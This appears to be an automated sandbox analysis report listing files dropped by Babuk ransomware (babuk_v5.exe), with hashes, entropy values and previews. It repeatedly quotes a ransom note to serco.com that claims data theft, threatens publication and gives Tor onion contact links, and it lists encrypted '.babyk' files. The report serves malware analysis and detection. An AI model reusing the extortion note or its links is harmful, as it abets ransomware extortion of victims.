                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\DBG\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft Help\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\MicrosoftEdge\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\MicrosoftEdge\SharedCacheContainers\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\MicrosoftEdge\SharedCacheContainers\MicrosoftEdge_DNTException\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\MicrosoftEdge\SharedCacheContainers\MicrosoftEdge_DNTException\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.6084448961614495
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlSrK63Ugz1inFU7+Rre/qwb2tUy9tt2zAsal+QoHNLUxNvEEn:EfZ18VeSwmptiaKNL0vtn
                                                                            MD5:1CC2D60122B4248F21DA1993BDB42F01
                                                                            SHA1:D279A63F9FC4AD19F0C0E4F1E8B3D82B5C5ABDE5
                                                                            SHA-256:E9FA016A0E8AE39617FF5F5ACD91FBBA533FBED434611647998282AF6D8E6B84
                                                                            SHA-512:FAB3A02F902658CFBE41CC9CFF354F4D15E67A351FFDC027BD48D46C75FC1EB76B5098EC9BECBBE16C84F2756C3ACA531D95412EF2C42424742FE32A92E2A5B9
                                                                            Malicious:false
                                                                            Preview: ........RNs.p.S.44..}.bQP..rEB.`... .^.{.<d......7...9.Rd.q+...G@s..../aH.Y8W)m...}q...N..i.%I.E'...".$..B..-.zc.LS.s.x..........choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\addinutil.exe.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):371
                                                                            Entropy (8bit):7.383050183930177
                                                                            Encrypted:false
                                                                            SSDEEP:6:hIteo+H19K1phCN+TpqaVpA/wriAbLUXcI4Z8QSRs2CKEBf6fiNOoNArf24i//+Z:qL+H198phD1qf/w2Aac7ZgUKanNOaArb
                                                                            MD5:2CBFBCEB0B648BBC239B02A376D102F6
                                                                            SHA1:1470510516B3260CEB5B3426A57EC48FB2AC9EF0
                                                                            SHA-256:15F46BA5F6FA95D7917F56927200F5F2EA851CFCA79783FA2CC9CB9DAE3BD4D5
                                                                            SHA-512:96B97CD62DA28EC2D5B3F970321C71E2657C3E89FC2B0FBF1C70E4B906BF59A13EA09785FF349D6C258346AF697C3B3836819079AB17AAB7D555A9BBC5A2BC9E
                                                                            Malicious:false
                                                                            Preview: .....G......U......Z..0.[....iP.....d.j........6.;..A*....R(...Vc..@B.D\D:f..+.U..y.b_f.*..s.0..e...`.L~.@..5..........|.....ZO..CF.>.:.&......3.6....!O.Y.*g.S..0.v..LYsc....v0.j..C..u..;.A..>.......A3.%.7B..M....^"?n.../O.>}Y!$(kR........s.1.....e4.$@...X[./.<.f3....<..8.....-.j...):.t*}..G0.....F...x..znK|.....1J....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):556
                                                                            Entropy (8bit):7.66870574939786
                                                                            Encrypted:false
                                                                            SSDEEP:12:VsYMmMfwhcABNYqqvVmTaHdcIPi6EvbQTO36IK7y:VlMZI5BmuaHdcIqzcTO36IK7y
                                                                            MD5:1711EB9EEE0DD9FD88BFF3D0059BBCD0
                                                                            SHA1:3A74B5BF52A1D9D687D93B5117B784F35F5C6860
                                                                            SHA-256:AA4B522801FEB4DB857A9E1D9B50CF31BAFB0072C3BEF47C7A24B3DB0E96A0A4
                                                                            SHA-512:928136C062FFDED83325E10D6CBE77AFAB2275942194714AAE68AFC444F8050A725BFAE2F8F49ED5C61492BEC484FAC4B6E5AC8A1B972090351753A1D1615C49
                                                                            Malicious:false
                                                                            Preview: (\.s....C.Ht!it.*..y.....j..].UIC.v......Cc..])%.....FWW.?./...3}............<>..A.To.D[`.B...nD][Q..'m.t.%....sGs.L..c...{..}q.....k..c......I.H....V......i>....y.0/~....s^.gjJT....a%8.j..1.a..qj<|....m....{np.N....l8&..|.....|B.....E...5++..T..u...d...O..U.l.Af.._2}. 4......G,.E..%..M..s.8....3.P........#tq.......4..n$.B\.=.7......f....V..X9.ir.(.7.; ..4......Y........B.....+1Q..'bF. .`.._..x.4.`xDH..<...b#....a..1.\.!.."...,..]...............-...[..f..4k.D...G.+7.m....D.\LU.p...$....b..q]SK..y....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NGenTask.exe.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):810
                                                                            Entropy (8bit):7.739380938745983
                                                                            Encrypted:false
                                                                            SSDEEP:12:T5N5fG98uUSI9ktoU2C9nYozQqTqJ0VMps9y+z+7w+zmbYLKdkHjOtrQKlJ:NNhG90SI9h/C9nxzQCGm9y+zOfm4615D
                                                                            MD5:B08C853E617BEC10B6FF22BA2A9D4990
                                                                            SHA1:CEEC659F7F909E3DF54A271374E619E8A63CC452
                                                                            SHA-256:5C834F289F402CAF0340136CF1FCAC637781300847035C927DD53C6CD273DF99
                                                                            SHA-512:3E0E6BAE5B24E1CF04B1669BA8DC140532F2F81DF5CFC5A5414D243A8D7C6C76E57918FA0C1105900CB7C1AF2C787BE799B4B196ECEEB376053AA8AF8C8265F3
                                                                            Malicious:false
                                                                            Preview: .^.K........$B.a^.6.Z..B&....8..;4...x?B$%1..........&!...vYZ.....Y......M3..>~...?V..:..-...r.....R..q)HO..=.?..........Z...VH..Iw.Q..N.......8..........JB...`.j.%..6.7.c~x...I.."&S.\.pNY.P.R.}m.... .0.1...y...n...}W..H..:....*.._..E]..{..i.....;.R..{[.........9a.cJg.......{...yAG;.i...hn......n.3,u.....J7<!g{.)~L,.+..!....Mr.xYS...R..1$4..M._f.S.].Fu_.....?..f.En.D.s9........FD.4.p....No.<.<*).FJi.=.$k..zC.................mJ.N(..A..8.}[.1@....O2.....I......+.F............F0.,WJ.g..s...m.PL........@..._.$...ni.8.^.[.JX9......;..I..dQl.KI.M..Bw.r.._...=...m`..z*r.y.ZPX].D....'Q....)6....=D..^....w.......u...[F<.......!. .[\26.......:.i....k.#.`.M..V..v..f.7]|.9B.Wn.4.N:.m%.q.{(..o.!.J...D.G.'d.M. 8.*'h..p7mw.]..[Ws...{....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):3985
                                                                            Entropy (8bit):7.943965924464039
                                                                            Encrypted:false
                                                                            SSDEEP:96:zdQktm0gTyYkJWuGdWRnxiQuaYOSN+5NKhdds6ZiUglKtlVM:z1Y0PpTGQRnYrOY+5wfds6ZiUea4
                                                                            MD5:39372168978E86FFD44CE23B7D345185
                                                                            SHA1:D18DB835947712D8FD5A26BBEB858D7FBB181320
                                                                            SHA-256:F7E38375CDA318447BF7F9FB4BFCD064D318D34D6662B138D06061801562C4B8
                                                                            SHA-512:54C07B29D4EBCE109AC68AB873478E8CDE4133168F5754E774F8B61853E36DC8EFB0E0B42846027CDE684021EE156B85C3C1D34D40373C1AB3AAF25E6CF46CE6
                                                                            Malicious:false
